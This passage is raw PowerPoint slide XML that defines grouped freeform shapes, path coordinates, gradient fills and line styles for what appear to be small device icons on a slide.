                    <a:ext cx="27" cy="851"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 57"/>
                      <a:gd name="T1" fmla="*/ 78 h 1774"/>
                      <a:gd name="T2" fmla="*/ 0 w 57"/>
                      <a:gd name="T3" fmla="*/ 836 h 1774"/>
                      <a:gd name="T4" fmla="*/ 0 w 57"/>
                      <a:gd name="T5" fmla="*/ 836 h 1774"/>
                      <a:gd name="T6" fmla="*/ 0 w 57"/>
                      <a:gd name="T7" fmla="*/ 836 h 1774"/>
                      <a:gd name="T8" fmla="*/ 0 w 57"/>
                      <a:gd name="T9" fmla="*/ 1303 h 1774"/>
                      <a:gd name="T10" fmla="*/ 0 w 57"/>
                      <a:gd name="T11" fmla="*/ 1303 h 1774"/>
                      <a:gd name="T12" fmla="*/ 0 w 57"/>
                      <a:gd name="T13" fmla="*/ 1303 h 1774"/>
                      <a:gd name="T14" fmla="*/ 0 w 57"/>
                      <a:gd name="T15" fmla="*/ 1774 h 1774"/>
                      <a:gd name="T16" fmla="*/ 57 w 57"/>
                      <a:gd name="T17" fmla="*/ 1757 h 1774"/>
                      <a:gd name="T18" fmla="*/ 57 w 57"/>
                      <a:gd name="T19" fmla="*/ 0 h 1774"/>
                      <a:gd name="T20" fmla="*/ 0 w 57"/>
                      <a:gd name="T21" fmla="*/ 78 h 17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7" h="1774">
                        <a:moveTo>
                          <a:pt x="0" y="78"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="836"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="836"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="836"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1303"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1303"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1303"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1774"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="57" y="1757"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="57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rgbClr val="A0A0A0"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:schemeClr val="bg1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936" name="Group 935"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5356991" y="3068218"/>
              <a:ext cx="2311330" cy="784073"/>
              <a:chOff x="1955870" y="2853943"/>
              <a:chExt cx="2311330" cy="784073"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="937" name="Freeform 1305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1955870" y="3015735"/>
                <a:ext cx="2311330" cy="622281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ACACA"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd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8" name="Freeform 1310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2197671" y="3081520"/>
                <a:ext cx="1827729" cy="492492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noFill/>
              <a:ln w="38100" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="3366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ACACA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9" name="Line 1706"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2332795" y="3015735"/>
                <a:ext cx="0" cy="28091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0" name="Line 1707"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2734610" y="2894835"/>
                <a:ext cx="0" cy="28091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941" name="Group 1688"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2695496" y="2853943"/>
                <a:ext cx="264915" cy="225800"/>
                <a:chOff x="4876" y="-3681"/>
                <a:chExt cx="865" cy="735"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="958" name="Freeform 1689"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5536" y="-3537"/>
                  <a:ext cx="205" cy="506"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 87"/>
                    <a:gd name="T1" fmla="*/ 9 h 214"/>
                    <a:gd name="T2" fmla="*/ 14 w 87"/>
                    <a:gd name="T3" fmla="*/ 190 h 214"/>
                    <a:gd name="T4" fmla="*/ 69 w 87"/>
                    <a:gd name="T5" fmla="*/ 197 h 214"/>
                    <a:gd name="T6" fmla="*/ 75 w 87"/>
                    <a:gd name="T7" fmla="*/ 4 h 214"/>
                    <a:gd name="T8" fmla="*/ 43 w 87"/>
                    <a:gd name="T9" fmla="*/ 9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7" h="214">
                      <a:moveTo>
                        <a:pt x="43" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="17"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="14" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="209"/>
                        <a:pt x="49" y="214"/>
                        <a:pt x="69" y="197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="182"/>
                        <a:pt x="87" y="16"/>
                        <a:pt x="75" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="4"/>
                        <a:pt x="58" y="0"/>
                        <a:pt x="43" y="9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1690"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5054" y="-3681"/>
                  <a:ext cx="630" cy="654"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 267"/>
                    <a:gd name="T1" fmla="*/ 8 h 277"/>
                    <a:gd name="T2" fmla="*/ 14 w 267"/>
                    <a:gd name="T3" fmla="*/ 206 h 277"/>
                    <a:gd name="T4" fmla="*/ 247 w 267"/>
                    <a:gd name="T5" fmla="*/ 268 h 277"/>
                    <a:gd name="T6" fmla="*/ 247 w 267"/>
                    <a:gd name="T7" fmla="*/ 70 h 277"/>
                    <a:gd name="T8" fmla="*/ 14 w 267"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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67" h="277">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="225"/>
                        <a:pt x="234" y="277"/>
                        <a:pt x="247" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="260"/>
                        <a:pt x="267" y="108"/>
                        <a:pt x="247" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="56"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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60" name="Freeform 1691"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-3620"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="68627"/>
                        <a:invGamma/>
                      </a:srgbClr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61" name="Freeform 1692"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5087" y="-3681"/>
                  <a:ext cx="640" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 100 w 271"/>
                    <a:gd name="T1" fmla="*/ 14 h 73"/>
                    <a:gd name="T2" fmla="*/ 41 w 271"/>
                    <a:gd name="T3" fmla="*/ 4 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 271"/>
                    <a:gd name="T5" fmla="*/ 8 h 73"/>
                    <a:gd name="T6" fmla="*/ 233 w 271"/>
                    <a:gd name="T7" fmla="*/ 70 h 73"/>
                    <a:gd name="T8" fmla="*/ 265 w 271"/>
                    <a:gd name="T9" fmla="*/ 65 h 73"/>
                    <a:gd name="T10" fmla="*/ 100 w 271"/>
                    <a:gd name="T11" fmla="*/ 14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1" h="73">
                      <a:moveTo>
                        <a:pt x="100" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="9"/>
                        <a:pt x="48" y="4"/>
                        <a:pt x="41" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="4"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="222" y="60"/>
                        <a:pt x="233" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="73"/>
                        <a:pt x="271" y="69"/>
                        <a:pt x="265" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="257" y="59"/>
                        <a:pt x="161" y="29"/>
                        <a:pt x="100" y="1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62" name="Freeform 1693"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3154"/>
                  <a:ext cx="660" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 660"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 660"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 660 w 660"/>
                    <a:gd name="T5" fmla="*/ 120 h 175"/>
                    <a:gd name="T6" fmla="*/ 452 w 660"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 660"/>
                    <a:gd name="T9" fmla="*/ 52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0" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="660" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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Freeform 1694"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5328" y="-3034"/>
                  <a:ext cx="198" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 198"/>
                    <a:gd name="T1" fmla="*/ 55 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 198"/>
                    <a:gd name="T3" fmla="*/ 88 h 88"/>
                    <a:gd name="T4" fmla="*/ 198 w 198"/>
                    <a:gd name="T5" fmla="*/ 36 h 88"/>
                    <a:gd name="T6" fmla="*/ 198 w 198"/>
                    <a:gd name="T7" fmla="*/ 0 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 198"/>
                    <a:gd name="T9" fmla="*/ 55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8" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="0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Freeform 1695"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3102"/>
                  <a:ext cx="452" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 452 w 452"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 35 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 156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2" h="156">
                      <a:moveTo>
                        <a:pt x="452" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="15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1696"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4938" y="-3140"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 383 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 104 h 139"/>
                    <a:gd name="T6" fmla="*/ 135 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 38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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="0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42" name="Group 1697"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2291901" y="2969508"/>
                <a:ext cx="264915" cy="225800"/>
                <a:chOff x="4876" y="-3681"/>
                <a:chExt cx="865" cy="735"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="950" name="Freeform 1698"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5536" y="-3537"/>
                  <a:ext cx="205" cy="506"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 87"/>
                    <a:gd name="T1" fmla="*/ 9 h 214"/>
                    <a:gd name="T2" fmla="*/ 14 w 87"/>
                    <a:gd name="T3" fmla="*/ 190 h 214"/>
                    <a:gd name="T4" fmla="*/ 69 w 87"/>
                    <a:gd name="T5" fmla="*/ 197 h 214"/>
                    <a:gd name="T6" fmla="*/ 75 w 87"/>
                    <a:gd name="T7" fmla="*/ 4 h 214"/>
                    <a:gd name="T8" fmla="*/ 43 w 87"/>
                    <a:gd name="T9" fmla="*/ 9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7" h="214">
                      <a:moveTo>
                        <a:pt x="43" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="17"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="14" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="209"/>
                        <a:pt x="49" y="214"/>
                        <a:pt x="69" y="197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="182"/>
                        <a:pt x="87" y="16"/>
                        <a:pt x="75" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="4"/>
                        <a:pt x="58" y="0"/>
                        <a:pt x="43" y="9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51" name="Freeform 1699"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5054" y="-3681"/>
                  <a:ext cx="630" cy="654"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 267"/>
                    <a:gd name="T1" fmla="*/ 8 h 277"/>
                    <a:gd name="T2" fmla="*/ 14 w 267"/>
                    <a:gd name="T3" fmla="*/ 206 h 277"/>
                    <a:gd name="T4" fmla="*/ 247 w 267"/>
                    <a:gd name="T5" fmla="*/ 268 h 277"/>
                    <a:gd name="T6" fmla="*/ 247 w 267"/>
                    <a:gd name="T7" fmla="*/ 70 h 277"/>
                    <a:gd name="T8" fmla="*/ 14 w 267"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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67" h="277">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="225"/>
                        <a:pt x="234" y="277"/>
                        <a:pt x="247" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="260"/>
                        <a:pt x="267" y="108"/>
                        <a:pt x="247" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="56"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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52" name="Freeform 1700"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-3620"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="70588"/>
                        <a:invGamma/>
                      </a:srgbClr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Freeform 1701"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5087" y="-3681"/>
                  <a:ext cx="640" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 100 w 271"/>
                    <a:gd name="T1" fmla="*/ 14 h 73"/>
                    <a:gd name="T2" fmla="*/ 41 w 271"/>
                    <a:gd name="T3" fmla="*/ 4 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 271"/>
                    <a:gd name="T5" fmla="*/ 8 h 73"/>
                    <a:gd name="T6" fmla="*/ 233 w 271"/>
                    <a:gd name="T7" fmla="*/ 70 h 73"/>
                    <a:gd name="T8" fmla="*/ 265 w 271"/>
                    <a:gd name="T9" fmla="*/ 65 h 73"/>
                    <a:gd name="T10" fmla="*/ 100 w 271"/>
                    <a:gd name="T11" fmla="*/ 14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1" h="73">
                      <a:moveTo>
                        <a:pt x="100" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="9"/>
                        <a:pt x="48" y="4"/>
                        <a:pt x="41" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="4"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="222" y="60"/>
                        <a:pt x="233" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="73"/>
                        <a:pt x="271" y="69"/>
                        <a:pt x="265" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="257" y="59"/>
                        <a:pt x="161" y="29"/>
                        <a:pt x="100" y="1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Freeform 1702"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3154"/>
                  <a:ext cx="660" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 660"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 660"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 660 w 660"/>
                    <a:gd name="T5" fmla="*/ 120 h 175"/>
                    <a:gd name="T6" fmla="*/ 452 w 660"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 660"/>
                    <a:gd name="T9" fmla="*/ 52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0" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="660" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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Freeform 1703"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5328" y="-3034"/>
                  <a:ext cx="198" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 198"/>
                    <a:gd name="T1" fmla="*/ 55 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 198"/>
                    <a:gd name="T3" fmla="*/ 88 h 88"/>
                    <a:gd name="T4" fmla="*/ 198 w 198"/>
                    <a:gd name="T5" fmla="*/ 36 h 88"/>
                    <a:gd name="T6" fmla="*/ 198 w 198"/>
                    <a:gd name="T7" fmla="*/ 0 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 198"/>
                    <a:gd name="T9" fmla="*/ 55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8" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="0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1704"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3102"/>
                  <a:ext cx="452" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 452 w 452"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 35 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 156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2" h="156">
                      <a:moveTo>
                        <a:pt x="452" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="15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1705"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4938" y="-3140"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 383 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 104 h 139"/>
                    <a:gd name="T6" fmla="*/ 135 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 38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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="0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43" name="Group 1787"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2412802" y="2933950"/>
                <a:ext cx="275582" cy="428485"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="945" name="Freeform 1788"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2474" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
